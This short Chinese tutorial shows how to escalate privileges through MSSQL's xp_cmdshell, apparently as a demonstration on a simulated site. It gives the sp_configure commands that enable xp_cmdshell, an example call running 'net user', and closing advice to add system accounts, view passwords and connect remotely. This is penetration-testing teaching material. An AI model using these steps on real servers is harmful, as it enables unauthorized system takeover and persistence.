第三方服务提权之mssql提权

Mssql默认运行在system权限上，可以通过xp_cmdshell组件执行系统命令。

 

利用条件：

数据库账号是DBA权限

 

模拟站点演示：

     SQL Server阻止了对组件’xp_cmdshell’的过程’sys.xp_cmdshell’的访问，系统管理员可以通过使用sp_configure启用’xp_cmdshell’。

Xp_cmdshell查询语法：

例：Exec master.dbo.xp_cmdshell ‘net user’

启动xp_cmdshell组件语法：

USE master

EXEC sp_configure 'show advanced options', 1

RECONFIGURE WITH OVERRIDE

EXEC sp_configure 'xp_cmdshell', 1

RECONFIGURE WITH OVERRIDE

EXEC sp_configure 'show advanced options', 0

RECONFIGURE WITH OVERRIDE

关闭xp_cmdshell组件语法：

USE master

EXEC sp_configure 'show advanced options', 1

RECONFIGURE WITH OVERRIDE

EXEC sp_configure 'xp_cmdshell', 0

RECONFIGURE WITH OVERRIDE

EXEC sp_configure 'show advanced options', 0

RECONFIGURE WITH OVERRIDE

提权成功后，接下来就是添加系统用户，查看系统用户密码，远程连接服务器。